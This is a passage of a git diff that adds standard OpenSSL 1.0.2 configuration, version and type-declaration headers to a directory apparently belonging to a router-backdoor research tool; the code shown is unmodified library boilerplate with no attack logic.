+#elif defined( __dgux )		/* 88K (but P6 in latest boxes) */
+#  define DES_UNROLL
+#elif defined( __sgi )		/* Newer MIPS */
+#  define DES_PTR
+#  define DES_RISC2
+#  define DES_UNROLL
+#elif defined(i386) || defined(__i386__)	/* x86 boxes, should be gcc */
+#  define DES_PTR
+#  define DES_RISC1
+#  define DES_UNROLL
+#endif /* Systems-specific speed defines */
+#endif
+
+#endif /* DES_DEFAULT_OPTIONS */
+#endif /* HEADER_DES_LOCL_H */
+#ifdef  __cplusplus
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslconf.h.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslconf.h.bak
new file mode 100644
index 0000000..467e03c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslconf.h.bak
@@ -0,0 +1,334 @@
+/* opensslconf.h */
+/* WARNING: Generated automatically from opensslconf.h.in by Configure. */
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+/* OpenSSL was configured with the following options: */
+#ifndef OPENSSL_DOING_MAKEDEPEND
+
+
+#ifndef OPENSSL_NO_COMP
+# define OPENSSL_NO_COMP
+#endif
+#ifndef OPENSSL_NO_DTLS1
+# define OPENSSL_NO_DTLS1
+#endif
+#ifndef OPENSSL_NO_EC
+# define OPENSSL_NO_EC
+#endif
+#ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
+# define OPENSSL_NO_EC_NISTP_64_GCC_128
+#endif
+#ifndef OPENSSL_NO_ECDH
+# define OPENSSL_NO_ECDH
+#endif
+#ifndef OPENSSL_NO_ECDSA
+# define OPENSSL_NO_ECDSA
+#endif
+#ifndef OPENSSL_NO_ENGINE
+# define OPENSSL_NO_ENGINE
+#endif
+#ifndef OPENSSL_NO_GMP
+# define OPENSSL_NO_GMP
+#endif
+#ifndef OPENSSL_NO_GOST
+# define OPENSSL_NO_GOST
+#endif
+#ifndef OPENSSL_NO_IDEA
+# define OPENSSL_NO_IDEA
+#endif
+#ifndef OPENSSL_NO_JPAKE
+# define OPENSSL_NO_JPAKE
+#endif
+#ifndef OPENSSL_NO_KRB5
+# define OPENSSL_NO_KRB5
+#endif
+#ifndef OPENSSL_NO_LIBUNBOUND
+# define OPENSSL_NO_LIBUNBOUND
+#endif
+#ifndef OPENSSL_NO_MD2
+# define OPENSSL_NO_MD2
+#endif
+#ifndef OPENSSL_NO_PSK
+# define OPENSSL_NO_PSK
+#endif
+#ifndef OPENSSL_NO_RC5
+# define OPENSSL_NO_RC5
+#endif
+#ifndef OPENSSL_NO_RFC3779
+# define OPENSSL_NO_RFC3779
+#endif
+#ifndef OPENSSL_NO_SCTP
+# define OPENSSL_NO_SCTP
+#endif
+#ifndef OPENSSL_NO_SRP
+# define OPENSSL_NO_SRP
+#endif
+#ifndef OPENSSL_NO_SSL_TRACE
+# define OPENSSL_NO_SSL_TRACE
+#endif
+#ifndef OPENSSL_NO_SSL2
+# define OPENSSL_NO_SSL2
+#endif
+#ifndef OPENSSL_NO_SSL3
+# define OPENSSL_NO_SSL3
+#endif
+#ifndef OPENSSL_NO_STORE
+# define OPENSSL_NO_STORE
+#endif
+#ifndef OPENSSL_NO_UNIT_TEST
+# define OPENSSL_NO_UNIT_TEST
+#endif
+
+#endif /* OPENSSL_DOING_MAKEDEPEND */
+
+#ifndef OPENSSL_NO_ASM
+# define OPENSSL_NO_ASM
+#endif
+#ifndef OPENSSL_NO_ERR
+# define OPENSSL_NO_ERR
+#endif
+#ifndef OPENSSL_NO_HW
+# define OPENSSL_NO_HW
+#endif
+#ifndef OPENSSL_NO_DYNAMIC_ENGINE
+# define OPENSSL_NO_DYNAMIC_ENGINE
+#endif
+
+/* The OPENSSL_NO_* macros are also defined as NO_* if the application
+   asks for it.  This is a transient feature that is provided for those
+   who haven't had the time to do the appropriate changes in their
+   applications.  */
+#ifdef OPENSSL_ALGORITHM_DEFINES
+# if defined(OPENSSL_NO_COMP) && !defined(NO_COMP)
+#  define NO_COMP
+# endif
+# if defined(OPENSSL_NO_DTLS1) && !defined(NO_DTLS1)
+#  define NO_DTLS1
+# endif
+# if defined(OPENSSL_NO_EC) && !defined(NO_EC)
+#  define NO_EC
+# endif
+# if defined(OPENSSL_NO_EC_NISTP_64_GCC_128) && !defined(NO_EC_NISTP_64_GCC_128)
+#  define NO_EC_NISTP_64_GCC_128
+# endif
+# if defined(OPENSSL_NO_ECDH) && !defined(NO_ECDH)
+#  define NO_ECDH
+# endif
+# if defined(OPENSSL_NO_ECDSA) && !defined(NO_ECDSA)
+#  define NO_ECDSA
+# endif
+# if defined(OPENSSL_NO_ENGINE) && !defined(NO_ENGINE)
+#  define NO_ENGINE
+# endif
+# if defined(OPENSSL_NO_GMP) && !defined(NO_GMP)
+#  define NO_GMP
+# endif
+# if defined(OPENSSL_NO_GOST) && !defined(NO_GOST)
+#  define NO_GOST
+# endif
+# if defined(OPENSSL_NO_IDEA) && !defined(NO_IDEA)
+#  define NO_IDEA
+# endif
+# if defined(OPENSSL_NO_JPAKE) && !defined(NO_JPAKE)
+#  define NO_JPAKE
+# endif
+# if defined(OPENSSL_NO_KRB5) && !defined(NO_KRB5)
+#  define NO_KRB5
+# endif
+# if defined(OPENSSL_NO_LIBUNBOUND) && !defined(NO_LIBUNBOUND)
+#  define NO_LIBUNBOUND
+# endif
+# if defined(OPENSSL_NO_MD2) && !defined(NO_MD2)
+#  define NO_MD2
+# endif
+# if defined(OPENSSL_NO_PSK) && !defined(NO_PSK)
+#  define NO_PSK
+# endif
+# if defined(OPENSSL_NO_RC5) && !defined(NO_RC5)
+#  define NO_RC5
+# endif
+# if defined(OPENSSL_NO_RFC3779) && !defined(NO_RFC3779)
+#  define NO_RFC3779
+# endif
+# if defined(OPENSSL_NO_SCTP) && !defined(NO_SCTP)
+#  define NO_SCTP
+# endif
+# if defined(OPENSSL_NO_SRP) && !defined(NO_SRP)
+#  define NO_SRP
+# endif
+# if defined(OPENSSL_NO_SSL_TRACE) && !defined(NO_SSL_TRACE)
+#  define NO_SSL_TRACE
+# endif
+# if defined(OPENSSL_NO_SSL2) && !defined(NO_SSL2)
+#  define NO_SSL2
+# endif
+# if defined(OPENSSL_NO_SSL3) && !defined(NO_SSL3)
+#  define NO_SSL3
+# endif
+# if defined(OPENSSL_NO_STORE) && !defined(NO_STORE)
+#  define NO_STORE
+# endif
+# if defined(OPENSSL_NO_UNIT_TEST) && !defined(NO_UNIT_TEST)
+#  define NO_UNIT_TEST
+# endif
+#endif
+
+/* crypto/opensslconf.h.in */
+
+/* Generate 80386 code? */
+#undef I386_ONLY
+
+#if !(defined(VMS) || defined(__VMS)) /* VMS uses logical names instead */
+#if defined(HEADER_CRYPTLIB_H) && !defined(OPENSSLDIR)
+#define ENGINESDIR "/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt/lib/engines"
+#define OPENSSLDIR "/home/lucca/Tenable/Routers/Phicomm/Tools/backdoor-lockpick/opt"
+#endif
+#endif
+
+#undef OPENSSL_UNISTD
+#define OPENSSL_UNISTD <unistd.h>
+
+#undef OPENSSL_EXPORT_VAR_AS_FUNCTION
+
+#if defined(HEADER_IDEA_H) && !defined(IDEA_INT)
+#define IDEA_INT unsigned int
+#endif
+
+#if defined(HEADER_MD2_H) && !defined(MD2_INT)
+#define MD2_INT unsigned int
+#endif
+
+#if defined(HEADER_RC2_H) && !defined(RC2_INT)
+/* I need to put in a mod for the alpha - eay */
+#define RC2_INT unsigned int
+#endif
+
+#if defined(HEADER_RC4_H)
+#if !defined(RC4_INT)
+/* using int types make the structure larger but make the code faster
+ * on most boxes I have tested - up to %20 faster. */
+/*
+ * I don't know what does "most" mean, but declaring "int" is a must on:
+ * - Intel P6 because partial register stalls are very expensive;
+ * - elder Alpha because it lacks byte load/store instructions;
+ */
+#define RC4_INT unsigned int
+#endif
+#if !defined(RC4_CHUNK)
+/*
+ * This enables code handling data aligned at natural CPU word
+ * boundary. See crypto/rc4/rc4_enc.c for further details.
+ */
+#define RC4_CHUNK unsigned long
+#endif
+#endif
+
+#if (defined(HEADER_NEW_DES_H) || defined(HEADER_DES_H)) && !defined(DES_LONG)
+/* If this is set to 'unsigned int' on a DEC Alpha, this gives about a
+ * %20 speed up (longs are 8 bytes, int's are 4). */
+#ifndef DES_LONG
+#define DES_LONG unsigned int
+#endif
+#endif
+
+#if defined(HEADER_BN_H) && !defined(CONFIG_HEADER_BN_H)
+#define CONFIG_HEADER_BN_H
+#undef BN_LLONG
+
+/* Should we define BN_DIV2W here? */
+
+/* Only one for the following should be defined */
+#define SIXTY_FOUR_BIT_LONG
+#undef SIXTY_FOUR_BIT
+#undef THIRTY_TWO_BIT
+#endif
+
+#if defined(HEADER_RC4_LOCL_H) && !defined(CONFIG_HEADER_RC4_LOCL_H)
+#define CONFIG_HEADER_RC4_LOCL_H
+/* if this is defined data[i] is used instead of *data, this is a %20
+ * speedup on x86 */
+#undef RC4_INDEX
+#endif
+
+#if defined(HEADER_BF_LOCL_H) && !defined(CONFIG_HEADER_BF_LOCL_H)
+#define CONFIG_HEADER_BF_LOCL_H
+#undef BF_PTR
+#endif /* HEADER_BF_LOCL_H */
+
+#if defined(HEADER_DES_LOCL_H) && !defined(CONFIG_HEADER_DES_LOCL_H)
+#define CONFIG_HEADER_DES_LOCL_H
+#ifndef DES_DEFAULT_OPTIONS
+/* the following is tweaked from a config script, that is why it is a
+ * protected undef/define */
+#ifndef DES_PTR
+#undef DES_PTR
+#endif
+
+/* This helps C compiler generate the correct code for multiple functional
+ * units.  It reduces register dependancies at the expense of 2 more
+ * registers */
+#ifndef DES_RISC1
+#undef DES_RISC1
+#endif
+
+#ifndef DES_RISC2
+#undef DES_RISC2
+#endif
+
+#if defined(DES_RISC1) && defined(DES_RISC2)
+YOU SHOULD NOT HAVE BOTH DES_RISC1 AND DES_RISC2 DEFINED!!!!!
+#endif
+
+/* Unroll the inner loop, this sometimes helps, sometimes hinders.
+ * Very mucy CPU dependant */
+#ifndef DES_UNROLL
+#define DES_UNROLL
+#endif
+
+/* These default values were supplied by
+ * Peter Gutman <pgut001@cs.auckland.ac.nz>
+ * They are only used if nothing else has been defined */
+#if !defined(DES_PTR) && !defined(DES_RISC1) && !defined(DES_RISC2) && !defined(DES_UNROLL)
+/* Special defines which change the way the code is built depending on the
+   CPU and OS.  For SGI machines you can use _MIPS_SZLONG (32 or 64) to find
+   even newer MIPS CPU's, but at the moment one size fits all for
+   optimization options.  Older Sparc's work better with only UNROLL, but
+   there's no way to tell at compile time what it is you're running on */
+ 
+#if defined( sun )		/* Newer Sparc's */
+#  define DES_PTR
+#  define DES_RISC1
+#  define DES_UNROLL
+#elif defined( __ultrix )	/* Older MIPS */
+#  define DES_PTR
+#  define DES_RISC2
+#  define DES_UNROLL
+#elif defined( __osf1__ )	/* Alpha */
+#  define DES_PTR
+#  define DES_RISC2
+#elif defined ( _AIX )		/* RS6000 */
+  /* Unknown */
+#elif defined( __hpux )		/* HP-PA */
+  /* Unknown */
+#elif defined( __aux )		/* 68K */
+  /* Unknown */
+#elif defined( __dgux )		/* 88K (but P6 in latest boxes) */
+#  define DES_UNROLL
+#elif defined( __sgi )		/* Newer MIPS */
+#  define DES_PTR
+#  define DES_RISC2
+#  define DES_UNROLL
+#elif defined(i386) || defined(__i386__)	/* x86 boxes, should be gcc */
+#  define DES_PTR
+#  define DES_RISC1
+#  define DES_UNROLL
+#endif /* Systems-specific speed defines */
+#endif
+
+#endif /* DES_DEFAULT_OPTIONS */
+#endif /* HEADER_DES_LOCL_H */
+#ifdef  __cplusplus
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslconf.h.in b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslconf.h.in
new file mode 100644
index 0000000..97e3745
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslconf.h.in
@@ -0,0 +1,154 @@
+/* crypto/opensslconf.h.in */
+
+/* Generate 80386 code? */
+#undef I386_ONLY
+
+#if !(defined(VMS) || defined(__VMS)) /* VMS uses logical names instead */
+#if defined(HEADER_CRYPTLIB_H) && !defined(OPENSSLDIR)
+#define ENGINESDIR "/usr/local/lib/engines"
+#define OPENSSLDIR "/usr/local/ssl"
+#endif
+#endif
+
+#undef OPENSSL_UNISTD
+#define OPENSSL_UNISTD <unistd.h>
+
+#undef OPENSSL_EXPORT_VAR_AS_FUNCTION
+
+#if defined(HEADER_IDEA_H) && !defined(IDEA_INT)
+#define IDEA_INT unsigned int
+#endif
+
+#if defined(HEADER_MD2_H) && !defined(MD2_INT)
+#define MD2_INT unsigned int
+#endif
+
+#if defined(HEADER_RC2_H) && !defined(RC2_INT)
+/* I need to put in a mod for the alpha - eay */
+#define RC2_INT unsigned int
+#endif
+
+#if defined(HEADER_RC4_H)
+#if !defined(RC4_INT)
+/* using int types make the structure larger but make the code faster
+ * on most boxes I have tested - up to %20 faster. */
+/*
+ * I don't know what does "most" mean, but declaring "int" is a must on:
+ * - Intel P6 because partial register stalls are very expensive;
+ * - elder Alpha because it lacks byte load/store instructions;
+ */
+#define RC4_INT unsigned int
+#endif
+#if !defined(RC4_CHUNK)
+/*
+ * This enables code handling data aligned at natural CPU word
+ * boundary. See crypto/rc4/rc4_enc.c for further details.
+ */
+#undef RC4_CHUNK
+#endif
+#endif
+
+#if (defined(HEADER_NEW_DES_H) || defined(HEADER_DES_H)) && !defined(DES_LONG)
+/* If this is set to 'unsigned int' on a DEC Alpha, this gives about a
+ * %20 speed up (longs are 8 bytes, int's are 4). */
+#ifndef DES_LONG
+#define DES_LONG unsigned long
+#endif
+#endif
+
+#if defined(HEADER_BN_H) && !defined(CONFIG_HEADER_BN_H)
+#define CONFIG_HEADER_BN_H
+#undef BN_LLONG
+
+/* Should we define BN_DIV2W here? */
+
+/* Only one for the following should be defined */
+#undef SIXTY_FOUR_BIT_LONG
+#undef SIXTY_FOUR_BIT
+#define THIRTY_TWO_BIT
+#endif
+
+#if defined(HEADER_RC4_LOCL_H) && !defined(CONFIG_HEADER_RC4_LOCL_H)
+#define CONFIG_HEADER_RC4_LOCL_H
+/* if this is defined data[i] is used instead of *data, this is a %20
+ * speedup on x86 */
+#undef RC4_INDEX
+#endif
+
+#if defined(HEADER_BF_LOCL_H) && !defined(CONFIG_HEADER_BF_LOCL_H)
+#define CONFIG_HEADER_BF_LOCL_H
+#undef BF_PTR
+#endif /* HEADER_BF_LOCL_H */
+
+#if defined(HEADER_DES_LOCL_H) && !defined(CONFIG_HEADER_DES_LOCL_H)
+#define CONFIG_HEADER_DES_LOCL_H
+#ifndef DES_DEFAULT_OPTIONS
+/* the following is tweaked from a config script, that is why it is a
+ * protected undef/define */
+#ifndef DES_PTR
+#undef DES_PTR
+#endif
+
+/* This helps C compiler generate the correct code for multiple functional
+ * units.  It reduces register dependancies at the expense of 2 more
+ * registers */
+#ifndef DES_RISC1
+#undef DES_RISC1
+#endif
+
+#ifndef DES_RISC2
+#undef DES_RISC2
+#endif
+
+#if defined(DES_RISC1) && defined(DES_RISC2)
+YOU SHOULD NOT HAVE BOTH DES_RISC1 AND DES_RISC2 DEFINED!!!!!
+#endif
+
+/* Unroll the inner loop, this sometimes helps, sometimes hinders.
+ * Very mucy CPU dependant */
+#ifndef DES_UNROLL
+#undef DES_UNROLL
+#endif
+
+/* These default values were supplied by
+ * Peter Gutman <pgut001@cs.auckland.ac.nz>
+ * They are only used if nothing else has been defined */
+#if !defined(DES_PTR) && !defined(DES_RISC1) && !defined(DES_RISC2) && !defined(DES_UNROLL)
+/* Special defines which change the way the code is built depending on the
+   CPU and OS.  For SGI machines you can use _MIPS_SZLONG (32 or 64) to find
+   even newer MIPS CPU's, but at the moment one size fits all for
+   optimization options.  Older Sparc's work better with only UNROLL, but
+   there's no way to tell at compile time what it is you're running on */
+ 
+#if defined( sun )		/* Newer Sparc's */
+#  define DES_PTR
+#  define DES_RISC1
+#  define DES_UNROLL
+#elif defined( __ultrix )	/* Older MIPS */
+#  define DES_PTR
+#  define DES_RISC2
+#  define DES_UNROLL
+#elif defined( __osf1__ )	/* Alpha */
+#  define DES_PTR
+#  define DES_RISC2
+#elif defined ( _AIX )		/* RS6000 */
+  /* Unknown */
+#elif defined( __hpux )		/* HP-PA */
+  /* Unknown */
+#elif defined( __aux )		/* 68K */
+  /* Unknown */
+#elif defined( __dgux )		/* 88K (but P6 in latest boxes) */
+#  define DES_UNROLL
+#elif defined( __sgi )		/* Newer MIPS */
+#  define DES_PTR
+#  define DES_RISC2
+#  define DES_UNROLL
+#elif defined(i386) || defined(__i386__)	/* x86 boxes, should be gcc */
+#  define DES_PTR
+#  define DES_RISC1
+#  define DES_UNROLL
+#endif /* Systems-specific speed defines */
+#endif
+
+#endif /* DES_DEFAULT_OPTIONS */
+#endif /* HEADER_DES_LOCL_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslv.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslv.h
new file mode 100644
index 0000000..e277cae
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/opensslv.h
@@ -0,0 +1,97 @@
+#ifndef HEADER_OPENSSLV_H
+# define HEADER_OPENSSLV_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/*-
+ * Numeric release version identifier:
+ * MNNFFPPS: major minor fix patch status
+ * The status nibble has one of the values 0 for development, 1 to e for betas
+ * 1 to 14, and f for release.  The patch level is exactly that.
+ * For example:
+ * 0.9.3-dev      0x00903000
+ * 0.9.3-beta1    0x00903001
+ * 0.9.3-beta2-dev 0x00903002
+ * 0.9.3-beta2    0x00903002 (same as ...beta2-dev)
+ * 0.9.3          0x0090300f
+ * 0.9.3a         0x0090301f
+ * 0.9.4          0x0090400f
+ * 1.2.3z         0x102031af
+ *
+ * For continuity reasons (because 0.9.5 is already out, and is coded
+ * 0x00905100), between 0.9.5 and 0.9.6 the coding of the patch level
+ * part is slightly different, by setting the highest bit.  This means
+ * that 0.9.5a looks like this: 0x0090581f.  At 0.9.6, we can start
+ * with 0x0090600S...
+ *
+ * (Prior to 0.9.3-dev a different scheme was used: 0.9.2b is 0x0922.)
+ * (Prior to 0.9.5a beta1, a different scheme was used: MMNNFFRBB for
+ *  major minor fix final patch/beta)
+ */
+# define OPENSSL_VERSION_NUMBER  0x1000200fL
+# ifdef OPENSSL_FIPS
+#  define OPENSSL_VERSION_TEXT    "OpenSSL 1.0.2-fips 22 Jan 2015"
+# else
+#  define OPENSSL_VERSION_TEXT    "OpenSSL 1.0.2 22 Jan 2015"
+# endif
+# define OPENSSL_VERSION_PTEXT   " part of " OPENSSL_VERSION_TEXT
+
+/*-
+ * The macros below are to be used for shared library (.so, .dll, ...)
+ * versioning.  That kind of versioning works a bit differently between
+ * operating systems.  The most usual scheme is to set a major and a minor
+ * number, and have the runtime loader check that the major number is equal
+ * to what it was at application link time, while the minor number has to
+ * be greater or equal to what it was at application link time.  With this
+ * scheme, the version number is usually part of the file name, like this:
+ *
+ *      libcrypto.so.0.9
+ *
+ * Some unixen also make a softlink with the major verson number only:
+ *
+ *      libcrypto.so.0
+ *
+ * On Tru64 and IRIX 6.x it works a little bit differently.  There, the
+ * shared library version is stored in the file, and is actually a series
+ * of versions, separated by colons.  The rightmost version present in the
+ * library when linking an application is stored in the application to be
+ * matched at run time.  When the application is run, a check is done to
+ * see if the library version stored in the application matches any of the
+ * versions in the version string of the library itself.
+ * This version string can be constructed in any way, depending on what
+ * kind of matching is desired.  However, to implement the same scheme as
+ * the one used in the other unixen, all compatible versions, from lowest
+ * to highest, should be part of the string.  Consecutive builds would
+ * give the following versions strings:
+ *
+ *      3.0
+ *      3.0:3.1
+ *      3.0:3.1:3.2
+ *      4.0
+ *      4.0:4.1
+ *
+ * Notice how version 4 is completely incompatible with version, and
+ * therefore give the breach you can see.
+ *
+ * There may be other schemes as well that I haven't yet discovered.
+ *
+ * So, here's the way it works here: first of all, the library version
+ * number doesn't need at all to match the overall OpenSSL version.
+ * However, it's nice and more understandable if it actually does.
+ * The current library version is stored in the macro SHLIB_VERSION_NUMBER,
+ * which is just a piece of text in the format "M.m.e" (Major, minor, edit).
+ * For the sake of Tru64, IRIX, and any other OS that behaves in similar ways,
+ * we need to keep a history of version numbers, which is done in the
+ * macro SHLIB_VERSION_HISTORY.  The numbers are separated by colons and
+ * should only keep the versions that are binary compatible with the current.
+ */
+# define SHLIB_VERSION_HISTORY ""
+# define SHLIB_VERSION_NUMBER "1.0.0"
+
+
+#ifdef  __cplusplus
+}
+#endif
+#endif                          /* HEADER_OPENSSLV_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ossl_typ.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ossl_typ.h
new file mode 100644
index 0000000..9144ea2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ossl_typ.h
@@ -0,0 +1,211 @@
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_OPENSSL_TYPES_H
+# define HEADER_OPENSSL_TYPES_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# include <openssl/e_os2.h>
+
+# ifdef NO_ASN1_TYPEDEFS
+#  define ASN1_INTEGER            ASN1_STRING
+#  define ASN1_ENUMERATED         ASN1_STRING
+#  define ASN1_BIT_STRING         ASN1_STRING
+#  define ASN1_OCTET_STRING       ASN1_STRING
+#  define ASN1_PRINTABLESTRING    ASN1_STRING
+#  define ASN1_T61STRING          ASN1_STRING
+#  define ASN1_IA5STRING          ASN1_STRING
+#  define ASN1_UTCTIME            ASN1_STRING
+#  define ASN1_GENERALIZEDTIME    ASN1_STRING
+#  define ASN1_TIME               ASN1_STRING
+#  define ASN1_GENERALSTRING      ASN1_STRING
+#  define ASN1_UNIVERSALSTRING    ASN1_STRING
+#  define ASN1_BMPSTRING          ASN1_STRING
+#  define ASN1_VISIBLESTRING      ASN1_STRING
+#  define ASN1_UTF8STRING         ASN1_STRING
+#  define ASN1_BOOLEAN            int
+#  define ASN1_NULL               int
+# else
+typedef struct asn1_string_st ASN1_INTEGER;
+typedef struct asn1_string_st ASN1_ENUMERATED;
+typedef struct asn1_string_st ASN1_BIT_STRING;
+typedef struct asn1_string_st ASN1_OCTET_STRING;
+typedef struct asn1_string_st ASN1_PRINTABLESTRING;
+typedef struct asn1_string_st ASN1_T61STRING;
+typedef struct asn1_string_st ASN1_IA5STRING;
+typedef struct asn1_string_st ASN1_GENERALSTRING;
+typedef struct asn1_string_st ASN1_UNIVERSALSTRING;
+typedef struct asn1_string_st ASN1_BMPSTRING;
+typedef struct asn1_string_st ASN1_UTCTIME;
+typedef struct asn1_string_st ASN1_TIME;
+typedef struct asn1_string_st ASN1_GENERALIZEDTIME;
+typedef struct asn1_string_st ASN1_VISIBLESTRING;
+typedef struct asn1_string_st ASN1_UTF8STRING;
+typedef struct asn1_string_st ASN1_STRING;
+typedef int ASN1_BOOLEAN;
+typedef int ASN1_NULL;
+# endif
+
+typedef struct asn1_object_st ASN1_OBJECT;
+
+typedef struct ASN1_ITEM_st ASN1_ITEM;
+typedef struct asn1_pctx_st ASN1_PCTX;
+
+# ifdef OPENSSL_SYS_WIN32
+#  undef X509_NAME
+#  undef X509_EXTENSIONS
+#  undef X509_CERT_PAIR
+#  undef PKCS7_ISSUER_AND_SERIAL
+#  undef OCSP_REQUEST
+#  undef OCSP_RESPONSE
+# endif
+
+# ifdef BIGNUM
+#  undef BIGNUM
+# endif
+typedef struct bignum_st BIGNUM;
+typedef struct bignum_ctx BN_CTX;
+typedef struct bn_blinding_st BN_BLINDING;
+typedef struct bn_mont_ctx_st BN_MONT_CTX;
+typedef struct bn_recp_ctx_st BN_RECP_CTX;
+typedef struct bn_gencb_st BN_GENCB;
+
+typedef struct buf_mem_st BUF_MEM;
+
+typedef struct evp_cipher_st EVP_CIPHER;
+typedef struct evp_cipher_ctx_st EVP_CIPHER_CTX;
+typedef struct env_md_st EVP_MD;
+typedef struct env_md_ctx_st EVP_MD_CTX;
+typedef struct evp_pkey_st EVP_PKEY;
+
+typedef struct evp_pkey_asn1_method_st EVP_PKEY_ASN1_METHOD;
+
+typedef struct evp_pkey_method_st EVP_PKEY_METHOD;
+typedef struct evp_pkey_ctx_st EVP_PKEY_CTX;
+
+typedef struct dh_st DH;
+typedef struct dh_method DH_METHOD;
+
+typedef struct dsa_st DSA;
+typedef struct dsa_method DSA_METHOD;
+
+typedef struct rsa_st RSA;
+typedef struct rsa_meth_st RSA_METHOD;
+
+typedef struct rand_meth_st RAND_METHOD;
+
+typedef struct ecdh_method ECDH_METHOD;
+typedef struct ecdsa_method ECDSA_METHOD;
+
+typedef struct x509_st X509;
+typedef struct X509_algor_st X509_ALGOR;
+typedef struct X509_crl_st X509_CRL;
+typedef struct x509_crl_method_st X509_CRL_METHOD;
+typedef struct x509_revoked_st X509_REVOKED;
+typedef struct X509_name_st X509_NAME;
+typedef struct X509_pubkey_st X509_PUBKEY;
+typedef struct x509_store_st X509_STORE;
+typedef struct x509_store_ctx_st X509_STORE_CTX;
+
+typedef struct pkcs8_priv_key_info_st PKCS8_PRIV_KEY_INFO;
+
+typedef struct v3_ext_ctx X509V3_CTX;
+typedef struct conf_st CONF;
+
+typedef struct store_st STORE;
+typedef struct store_method_st STORE_METHOD;
+
+typedef struct ui_st UI;
+typedef struct ui_method_st UI_METHOD;
+
+typedef struct st_ERR_FNS ERR_FNS;
+
+typedef struct engine_st ENGINE;
+typedef struct ssl_st SSL;
+typedef struct ssl_ctx_st SSL_CTX;
+
+typedef struct X509_POLICY_NODE_st X509_POLICY_NODE;
+typedef struct X509_POLICY_LEVEL_st X509_POLICY_LEVEL;
+typedef struct X509_POLICY_TREE_st X509_POLICY_TREE;
+typedef struct X509_POLICY_CACHE_st X509_POLICY_CACHE;
+
+typedef struct AUTHORITY_KEYID_st AUTHORITY_KEYID;
+typedef struct DIST_POINT_st DIST_POINT;
+typedef struct ISSUING_DIST_POINT_st ISSUING_DIST_POINT;
+typedef struct NAME_CONSTRAINTS_st NAME_CONSTRAINTS;
+
+  /* If placed in pkcs12.h, we end up with a circular depency with pkcs7.h */
+# define DECLARE_PKCS12_STACK_OF(type)/* Nothing */
+# define IMPLEMENT_PKCS12_STACK_OF(type)/* Nothing */
+
+typedef struct crypto_ex_data_st CRYPTO_EX_DATA;
+/* Callback types for crypto.h */
+typedef int CRYPTO_EX_new (void *parent, void *ptr, CRYPTO_EX_DATA *ad,
+                           int idx, long argl, void *argp);
+typedef void CRYPTO_EX_free (void *parent, void *ptr, CRYPTO_EX_DATA *ad,
+                             int idx, long argl, void *argp);
+typedef int CRYPTO_EX_dup (CRYPTO_EX_DATA *to, CRYPTO_EX_DATA *from,
+                           void *from_d, int idx, long argl, void *argp);
+
+typedef struct ocsp_req_ctx_st OCSP_REQ_CTX;
+typedef struct ocsp_response_st OCSP_RESPONSE;
